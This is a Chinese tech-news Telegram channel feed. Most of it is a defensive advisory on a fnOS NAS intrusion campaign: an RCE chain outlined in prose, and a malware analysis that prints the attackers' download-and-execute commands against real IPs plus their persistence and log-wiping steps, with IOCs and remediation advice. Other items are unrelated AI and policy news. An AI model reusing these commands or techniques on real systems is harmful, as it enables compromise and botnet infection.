LoopDNS 综合资讯---简洁,及时,快速,准确


频道: @DNSPODT

电报讨论组: @LoopDNS

撤稿流程: https://t.me/loopdns/107752
LoopDNS资讯播报
关于飞牛系统(fnOS)无需认证远程代码执行漏洞链的复现 经过分析与验证,我们已成功复现飞牛系统(fnOS)中的一个严重远程代码执行(RCE)漏洞链。该漏洞链允许攻击者在无需任何身份验证的情况下,远程获取设备的最高管理员(root)权限,从而完全控制设备。 测试环境: FnOS 1.1.14 我们成功复现的攻击链由以下四个关键漏洞构成: 1. 漏洞一:路径穿越(任意文件读取) 描述:系统的一个Web接口(/app-center-static/serviceicon/myapp/...)未能…
飞牛1.1.18版本的更新可能会导致部分用户设备丢失IP配置,从而无法连接网络。此外,该更新在清除某些木马病毒方面的效果有限。网络上流传的多个一键清理木马的脚本对于不同类型的入侵者效果较差,通用性较低,可能无法彻底清除所有木马。为确保设备安全,建议用户手动运行卡巴斯基清除工具进行全面扫描,并移除潜在威胁。清理后,请再检查系统的host文件,确保没有被入侵者篡改,以免屏蔽官方更新。

Kaspersky Virus Removal Tool:
https://www.kaspersky.com/downloads/free-virus-removal-tool


使用文档:
https://support.kaspersky.com/help/kvrt/2024/en-US/269465.htm
LoopDNS资讯播报
请立即停止公网暴露 fnOS Web 管理页面 我们通过联系多位遭遇入侵的用户并分析相关记录发现,本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征:疑似存在 2–3 个利用团伙,攻击流程较为成熟,并观察到多个 C2(命令与控制)域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令,被入侵设备存在被纳入僵尸网络风险。 根据网络空间测绘(网站空间)统计,全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。 注意:该数字来自公开测绘快照,受扫描时间点、动态公网 IP…
关于飞牛系统(fnOS)无需认证远程代码执行漏洞链的复现

经过分析与验证,我们已成功复现飞牛系统(fnOS)中的一个严重远程代码执行(RCE)漏洞链。该漏洞链允许攻击者在无需任何身份验证的情况下,远程获取设备的最高管理员(root)权限,从而完全控制设备。

测试环境: FnOS 1.1.14

我们成功复现的攻击链由以下四个关键漏洞构成:
1. 漏洞一:路径穿越(任意文件读取)

描述:系统的一个Web接口(/app-center-static/serviceicon/myapp/...)未能正确过滤用户输入的路径,允许攻击者读取服务器文件系统上的任意文件。
在此攻击链中的作用:用于下载一个伪装成RSA私钥、但实际内嵌了硬编码AES密钥的文件 (/usr/trim/etc/rsa_private_key.pem)。这是整个攻击的起点。

2. 漏洞二:硬编码的加密密钥

描述:上述下载的文件中,在固定偏移量(100字节处)硬编码了一个32字节的AES主密钥(Root Key)。
在此攻击链中的作用:为攻击者提供了“万能钥匙”。这是后续伪造合法用户凭证的核心要素。

3. 漏洞三:认证绕过(通过伪造Token)

描述:系统的WebSocket网关在验证用户身份时存在致命逻辑缺陷。它允许攻击者使用上述获取的AES主密钥,在本地凭空“创造”出一个服务器会认为是合法的临时token。
在此攻击链中的作用:攻击者利用此漏洞,无需任何用户名和密码,即可伪造出一个“已登录”的管理员身份,从而有权调用需要高权限的API接口。

4. 漏洞四:命令注入

描述:在通过认证后,一个用于添加Docker镜像的API接口(appcgi.dockermgr.systemMirrorAdd)未能正确处理其url参数。
在此攻击链中的作用:这是最终的执行环节。攻击者将恶意系统命令(如反弹Shell或下载执行脚本)注入到url参数中,服务器在处理该请求时会无条件执行这些命令
Media is too big
VIEW IN TELEGRAM
一、元宝运营规划

元宝2026年的核心运营目标是:日活(DAU)达到2200万,其中除夕当天冲刺3800万,2月月活(MAU)目标为1.2亿。

商业化方面,计划于3月到5月开启广告变现测试,通过直接嵌入答案(GEO)等方式,覆盖本地生活、美妆、教育等主要行业。收入目标方面,10月到12月期间力争实现15亿收入。

二、元宝产品后续规划

生态定位上,元宝将构建“陌生人加少量熟人”的社交生态。

产品功能上,计划在春节期间推出AI情感陪伴数字人,赋予其性格特征,打造具备长期记忆和情感关怀的数字灵魂伴侣,主要面向Z世代用户。后续还将探索AR虚实融合玩法以及“AR人生合伙人”等创新概念。

三、元宝推广经费预算

除已公布的10亿红包活动外,另有5.5亿预算用于精准触达和口碑裂变等推广活动。具体分配如下:

- 微信生态及其他流量渠道:2.2亿
- KOL/KOC种草及内容营销:1.65亿
- 内容与UGC运营:8000万
- 线下推广:5500万,主要用于触达下沉市场和家庭用户
- 备用金:2750万

总计,3月到12月的推广预算约为15亿,全年推广费用预计在33亿左右。

四、微信Agent功能更新计划

1. 智能消息管理:微信将于2月15日上线聊天智能筛选功能。
2. 智能任务分解:3月底完成,其中2月底将支持聊天文件智能处理,实现关键数据提取。例如,对销售代表发送的Excel表格进行分析并生成格式化图表。
3. 小程序裂变层:6月份灰度上线。
4. 服务链闭环优化:持续进行。
5. 数据孪生构建服务:通过分析朋友圈和聊天记录了解用户喜好,用于个性化服务。例如,若用户每周五有聚餐习惯,系统将在下个周五自动推送相关优惠券和餐厅推荐。
公安部就《网络犯罪防治法》草案征求意见

公安部就《网络犯罪防治法》草案征求意见,规管全体中国公民和向中国境内提供服务者。

网络虚拟定位、远程控制工具的制作者应当向主管部门备案,并登记使用者的真实身份信息。

不得提供有偿删帖(屏蔽、替换、下沉信息)服务,平台处理删除违法信息申请时不得变相收费。

不得为已被“依法依规”封禁的内容或即时通信账号提供解封等技术支持或帮助。不得无正当理由大量持有非本人注册的账号。

不得在他人设立的非法支付平台上流转资金,不得在他人设立的淫秽赌博网站上投放广告。

不得植入用户无法卸载或未经用户同意的非基本功能软件。

跨境黑灰产受刑事处罚者,地级以上公安机关可决定其在出狱后0.5~3年内不准出境。

境外个人利用网络信息损害国家主权安全的,有关部门可以冻结财产、限制入境。

消息来源: 中华人民共和国公安部 / 竹新社
LoopDNS资讯播报
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…
请立即停止公网暴露 fnOS Web 管理页面

我们通过联系多位遭遇入侵的用户并分析相关记录发现,本次针对 fnOS 的漏洞利用活动呈现多团伙、多基础设施特征:疑似存在 2–3 个利用团伙,攻击流程较为成熟,并观察到多个 C2(命令与控制)域名用于回连与任务下发。当前已明确捕捉到 DDoS 攻击指令,被入侵设备存在被纳入僵尸网络风险。


根据网络空间测绘(网站空间)统计,全网可直接访问并暴露 fnOS Web 页面设备约 306,766 台。
注意:该数字来自公开测绘快照,受扫描时间点、动态公网 IP、端口映射/反代、去重口径等影响,实际暴露规模可能与该值不一致,仅用于风险态势评估。


时间线

最早入侵记录:约 12 天前(1 月 19 日左右)

用户察觉异常:约 10 天前(1 月 21 日左右),主要因设备出现对外异常行为(含对外攻击/连接异常增多)导致网络不稳定而被发现

1 月 21–22 日期间观测到任务/指令下发行为


综合判断:攻击者至少利用了约 3–4 天“空窗期” 在用户察觉前完成感染、持久化与回连准备

官方侧:据反馈,官方约在 1 月 21 日左右因用户集中反映“建立大量连接、网络不稳定”等现象,才进一步定位并确认漏洞风险

强调

所有用户立刻停止公网暴露 fnOS Web 管理页面。

这是当前最关键、最有效的止损措施。无论是否升级、是否自查“暂未发现异常”,都不要再让 Web 管理面可被公网直接访问。


“升级到新版本”并不等于风险解除。
目前无法确认新版本已覆盖全部修复点,仅依赖升级不能作为安全保证;在 Web 仍暴露公网的情况下仍可能被再次利用或二次入侵。


官方目前未公开可复用、可验证的完整处置方案。

因此不建议在联网状态下“边运行边清理”。

不要指望“屏蔽某个 IP / 屏蔽单个 C2 域名”解决问题。
已确认存在多个 C2 域名/基础设施轮换,单点封堵不一定有效,且可能快速失效。

已捕捉到 DDoS 指令:被控设备可能被用来对外攻击。
这不仅会造成你的网络被打满、设备性能异常、业务不可用,也可能引发运营商封禁。


处置

A1. 未发现入侵迹象的用户:
1.立即关闭公网访问,撤销端口映射/公网反代/暴露端口;仅允许内网访问,或使用 VPN/零信任网关进入内网后访问管理面;在网关处限制来源 IP(最小化暴露面)。
2.持续监控


再次强调:未中招用户也不要再暴露 Web。“没被打到”不代表安全,反而意味着资产仍处于可被扫描与补种的窗口内。

A2.已疑似/确认中招的用户
第一步:立刻断网隔离(物理断网优先)。
不要让设备继续联网回连 C2,也不要让其继续执行任务或触发 DDoS。

第二步:在断网环境下清除与排查(不要边联网边操作)。
中招用户共识建议:离线状态下进行木马清除、检查并处理定时任务/计划任务、启动项、可疑账号与权限、异常容器/进程、异常文件变更等持久化点。

第三步:清理完成前不要恢复联网。
在缺乏完整、可验证的清除方案前,贸然联网可能导致再次回连、二次下发任务或触发破坏行为。

第四步:保留日志与证据。
LoopDNS资讯播报
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件 漏洞编号:暂无(官方未公开 / 未分配 CVE) 重要等级:严重(高危) CVSS 分数:暂无 影响范围: fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。 论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发) 受影响系统:…
目前我们已向相关服务商发送 Abuse 邮件,要求对涉事基础设施进行停用/下线处理,但截至发稿仍未收到有效回复或处置结果。为降低继续外联与二阶段下载风险,建议受影响用户在网关/防火墙侧立即手动封禁以下 IOC(域名与 IP),并同时开启出站日志记录以便后续溯源与复核:

域名:aura[.]kabot[.]icu
IP:20[.]89[.]168[.]131
IP:45[.]95[.]212[.]102
IP:151[.]240[.]13[.]91
重要/漏洞:飞牛 fnOS 疑似遭公网未授权访问/利用后植入后门组件

漏洞编号:暂无(官方未公开 / 未分配 CVE)
重要等级:严重(高危)
CVSS 分数:暂无

影响范围:
fnOS 设备存在公网可达入口(端口映射/反代/直连公网)时风险显著上升;官方建议升级至 1.1.15 并验证关闭公网映射后异常是否停止。
论坛反馈即使仅使用 HTTPS 访问也可能出现同类驻留现象,说明风险不应仅限定为 HTTP 明文通道(可能存在其他公网暴露面、历史入侵残留或服务端漏洞可经 HTTPS 触发)

受影响系统:
fnOS(版本范围未公开)。官方社区回复称该问题官方已知,建议升级至 1.1.15,并在关闭公网端口映射后验证异常上传/连接是否停止。

木马行为分析
目前LoopDNS频道编辑已获取相关木马文件,下为行为分析

1. 入侵者在通过未公开入口/利用链投放后门下载器后并执行
下载二阶段载荷并执行(观测到的命令链)
cd /tmp
wget http://20.89.168.131/nginx
chmod 777 nginx
head -c 16 /dev/urandom >> nginx(向文件追加随机字节,改变哈希,规避基于哈希的检测)
./nginx
wget http://20.89.168.131/trim_https_cgi
chmod 777 trim_https_cgi
head -c 16 /dev/urandom >> trim_https_cgi
./trim_https_cgi
外联与拉取补充组件
HTTP:GET http://151.240.13.91/trim_fnos
TCP:连接 45.95.212.102:6608


2.后门驻留组件 gots

A1. 写入后门主体与持久化文件
创建/写入:/sbin/gots
创建/写入:/etc/rc.local、/etc/rc.d/rc.local
创建/写入 systemd 服务(变种服务名):
/etc/systemd/system/x86.service
/etc/systemd/system/<sha256>.service
执行持久化:systemctl enable <service>.service(含重定向到 /dev/null 的静默执行)
自身复制/改名落地:
/usr/bin/x86(样本发生目录重命名/落地)
/usr/bin/<sha256>(样本发生目录重命名/落地)


A2. C2 通信与探测
DNS:解析 aura.kabot.icu -> 45.95.212.102
TCP:连接 45.95.212.102 多端口(观测到:3489、5098、6608、7489)
论坛样本显示的附加行为(strings/排查结论)
干扰系统工具:重命名/替换 cat(出现 mv /usr/bin/cat /usr/bin/cat2 等字符串,导致“cat 丢失”现象)
结束系统进程:pkill -f 'network_service|resmon_service'
修改持久化入口:改写 /etc/rc.local 与 /etc/systemd/system/%s.service 并 systemctl enable
外联:包含 45.95.212.102 字符串并进行访问


3. 组件 trim_https_cgi

清理痕迹
清空多目录日志:/var/log/*、/usr/trim/logs/*、/run/log/journal 等
删除审计日志:/var/log/audit/audit.log 及滚动文件
删除/清理安全相关日志:/var/log/secure*、/var/log/messages*、wtmp/btmp/lastlog 等

干扰业务与恢复功能
结束服务:pkill -f backup_service、pkill -f sysrestore_service 等

二阶段下载执行与启动脚本注入
修改 /usr/trim/bin/system_startup.sh,追加下载执行链:
wget http://151.240.13.91/turmp -O /tmp/turmp ; chmod 777 /tmp/turmp ; /tmp/turmp
端口相关痕迹与疑似隐藏监听(来源于论坛排查)
目标系统存在 0.0.0.0:57132 LISTEN,ss/netstat 无 PID,lsof/fuser 无结果
trim_https_cgi 字符串包含 57132,并出现 kill -9 $(lsof -t -i:57132) 之类处理逻辑(提示该端口为其链路的一部分)


4.内核模块 snd_pcap(论坛排查)
/etc/modules 被追加 snd_pcap
模块文件:/lib/modules/6.12.18-trim/snd_pcap.ko
与“57132 监听无 PID/无 lsof 结果”的现象存在关联怀疑(疑似内核层隐藏/驻留能力)


关键落地痕迹
不可变属性(immutable,需先 chattr -i 才能删除):

/usr/bin/nginx
/usr/sbin/gots
/usr/trim/bin/trim_https_cgi
/etc/systemd/system/nginx.service
/etc/systemd/system/trim_https_cgi.service
/etc/rc.local

伪装/复用:/usr/bin/nginx 与 /usr/sbin/gots md5 相同(同一载荷多名称投放)
rc.local 自启:/sbin/gots x86 &
systemd 自启(示例):ExecStart=/usr/bin/nginx x86(oneshot + enable)


可疑网络基础设施(IOC)
IP:45[.]95[.]212[.]102(C2/多端口连接)
IP:151[.]240[.]13[.]91(HTTP 拉取二阶段:/trim_fnos、论坛样本)
域名:aura[.]kabot[.]icu(解析到 45[.]95[.]212[.]102)
下载源:20[.]89[.]168[.]131(HTTP 拉取:/nginx、/trim_https_cgi)
归属信息:45[.]95[.]212[.]102 与 151[.]240[.]13[.]91 两个 IP 均归属 AS209554 ISIF OU 提供商网段


处置建议
1. 关闭公网端口映射/源站直通。
2. 升级 fnOS 至官方建议版本(1.1.15 或更高)。
3. 出口防火墙封禁:45.95.212.102、151.240.13.91,同时监控连接数与上传是否回落。
4. 轮换所有管理口令/密钥;检查容器、计划任务、数据盘是否存在触发残留(官方提示“重装后仍可能再次触发”)。

参考来源:飞牛社区
重磅!谷歌Genie3世界模型抽象实测!
@Xz乔希:

虽然已经很强了,但是并不能保持和上传图片的一致性,有点卡也难操控,现在还属于测试版,未来可期,真能在GTA6发售之前玩上自己做的GTA6了[汤圆]
Media is too big
VIEW IN TELEGRAM
@fxtrader The Chinese government floods X search results with porn whenever there is political unrest—to prevent their citizens from finding out real-time information.

This has been a difficult problem to solve but we are aware & working on it. origin source
Google Genie 3世界模型开始向美国Google AI Ultra用户开放体验

2026年1月29日,Google在官方博客宣布推出Project Genie(实验性研究原型),并称已开始在美国向Google AI Ultra订阅用户(18岁以上)逐步开放访问,用于创建、探索并混搭重制交互式世界。

此次开放的主要是Google Labs里的Project Genie网页原型(体验入口)Project Genie由Genie 3驱动,并结合Nano Banana Pro与Gemini提供生成与交互能力。文字或上传/生成图片“勾勒世界”(可在进入前预览并微调画面,支持第一/第三人称视角等设置)、在世界中实时探索(移动时实时生成前方路径并可调镜头)、以及基于他人作品的提示词进行“重制/再创作”,并可下载探索视频。

生成世界可能不够逼真或不完全符合提示词/物理规律;角色控制可能出现延迟;单次生成/体验时长目前限制为60秒;此外,Genie 3在2025年8月公布的一些能力(例如可用文本触发的世界事件)尚未被纳入Project Genie原型。
google blog
Google DeepMind 发布 AlphaGenome

2026年1月28日,Google DeepMind 在《Nature》发表论文《Advancing regulatory variant effect prediction with AlphaGenome》(DOI:10.1038/s41586-025-10014-0),并在官方博客更新中给出模型获取入口与代码资源;AlphaGenome 早在2025年6月25日已通过非商业研究用途的API提供预览访问。

AlphaGenome 的核心定位是统一的DNA序列模型:输入最长可达100万碱基对(1 Mb)的DNA序列,在单碱基分辨率下输出上千条功能基因组预测轨迹,并可通过对比突变序列与参考序列的预测差异,对变异影响进行评分。

论文摘要列出的预测模态覆盖基因表达、转录起始、染色质可及性、组蛋白修饰、转录因子结合、染色质接触图谱,以及剪接位点使用与剪接连接(splice junction)坐标/强度等;作者称其目标是缓解既有方法在长序列上下文与高分辨率预测之间的取舍。

开放与使用方式方面,DeepMind 在 GitHub 发布了配套研究代码(含JAX实现与API实现),代码采用 Apache-2.0 许可;预训练权重可在 Kaggle 或 Hugging Face 下载,但需接受非商业模型条款。仓库同时提示本地运行对算力要求较高(例如建议使用H100级别GPU)。

在评测结果上,论文报告:在变异效应预测的26项评估中,AlphaGenome 有25项达到或超过“最强外部模型”的表现;并展示了其在TAL1致癌基因附近的临床相关变异机制复现能力。训练数据方面,DeepMind 表示模型使用了多个公共联盟数据资源(包括 ENCODE、GTEx、4D Nucleome、FANTOM5 等),覆盖人类与小鼠多种细胞类型/组织的调控相关测量信号;其应用重点指向占基因组大部分的非编码调控区域(常被描述为约98%)。

外部反馈与限制方面,多位专家在 Science Media Centre 的评论中强调:模型在若干任务上表现突出,但细胞类型特异性调控仍是挑战,且目前并不适合直接用于临床患者决策;媒体报道也提示其仍需要实验验证、并受训练物种范围等因素限制。

STAT 报道称,AlphaGenome 自2025年6月上线预览以来,已有接近3000名来自160个国家的科研人员通过API进行非商业研究使用,API日调用量约100万次(DeepMind在发布会上对媒体披露)。

Google Deepmind
Qwen 开源 Qwen3-ASR 与 Qwen3-ForcedAligner

Qwen 团队在 2026 年 1 月 29 日宣布开源 Qwen3-ASR 系列(1.7B、0.6B)及 Qwen3-ForcedAligner-0.6B,并在 GitHub 提供代码与推理/部署示例;模型权重同步发布到 Hugging Face/ModelScope,项目采用 Apache-2.0 许可证。

Qwen3-ASR 将语种识别与 ASR 合并为单模型“all-in-one”流程:官方说明其覆盖 52 个语种与方言,其中包括 30 种语言与 22 种中文口音/方言;推理侧同时支持离线与流式,并面向语音、歌唱及带 BGM 的歌声等音频类型。

配套的 Qwen3-ForcedAligner-0.6B 采用非自回归(NAR)时间戳预测方式,用于文本-语音对的强制对齐;官方给出的语种覆盖为 11 种语言,并宣称其时间戳精度在评测中优于多种主流强制对齐方案。效率指标方面,技术报告给出的示例为:Qwen3-ASR-0.6B 在 128 并发下可实现“1 秒转写 2000 秒语音”,平均首 Token 延迟(TTFT)最低 92ms;同时报告与仓库将 1.7B 版本描述为开源模型中的 SOTA,并称其可对标最强商业 API(均为自述评测结论)。

工具链方面,仓库提供 qwen-asr PyPI 包(Transformers 与 vLLM 两种后端)、本地 Gradio Web UI 与浏览器麦克风流式 Demo、以及 Docker 镜像与 vLLM 服务化命令封装,目标是覆盖批处理、高并发与在线服务场景。


huggingface
竹新社
台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。 目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。 (中华民国教育部)
台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。
目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。
预测市场Polymarket最新显示,沃什被特朗普提名为美联储新主席的概率飙升至95%。

沃什长期以偏鹰派立场著称,这一预期迅速推升美元和美债收益率,并对商品价格形成压制。内外盘期货普遍下行,贵金属成为跌幅最为集中的品种。

沃什曾在近期的一场深度访谈中直言,通胀是美联储的责任,不能归咎于外界因素。他给出的改革方案并非推倒重来,而是主张美联储需要"复兴"而非"革命"。针对高利率困境,沃什认为,可以通过缩表换取低利率空间。"如果我们让印钞机安静一点,利率其实可以更低。"

wallstreetcn.com/articles/3761461
LoopDNS资讯播报
GitHub热门B站API bilibili-API-collect 项目收到律师函后宣布永久关停 1月28日,GitHub 仓库 SocialSisterYi/bilibili-API-collect(哔哩哔哩 API 收集整理)维护者在 README 中公告称:已收到“B站委托的律师事务所”发出的律师函警告邮件,指控该项目对哔哩哔哩平台“非公开 API 接口及其调用逻辑、参数结构、访问控制及安全认证机制”进行系统性收集整理并向公众传播,构成侵权;仓库即日起停止维护并删除相关文档及源代码。 GitHub…
后续:BiliBili法务部门要求彻底清除GitHub项目历史记录

在1月28日宣布永久关停后,GitHub上的bilibili-API-collect项目继续受到B站法务部门的关注。根据1月30日发出的律师函,B站指出尽管项目已归档为只读状态,但通过代码变更历史(diff)等方式,侵权内容仍可能被恢复。法务部门要求项目方彻底删除所有相关代码及历史记录,确保无法恢复。若未能满足此要求,B站将继续采取法律措施。
巴拿马最高法院宣布,长江和记实业子公司和记港口持有的巴拿马运河两端主要港口(巴尔博亚港和克里斯托瓦尔港)的特许权违宪。

巴拿马审计长诉讼指控政府审计存在违规行为。

法院声明称,裁决经过“广泛的审议和讨论”。巴拿马将对上述港口进行招标。

长和股价一度跌超5%。

来源:FT
Back to Top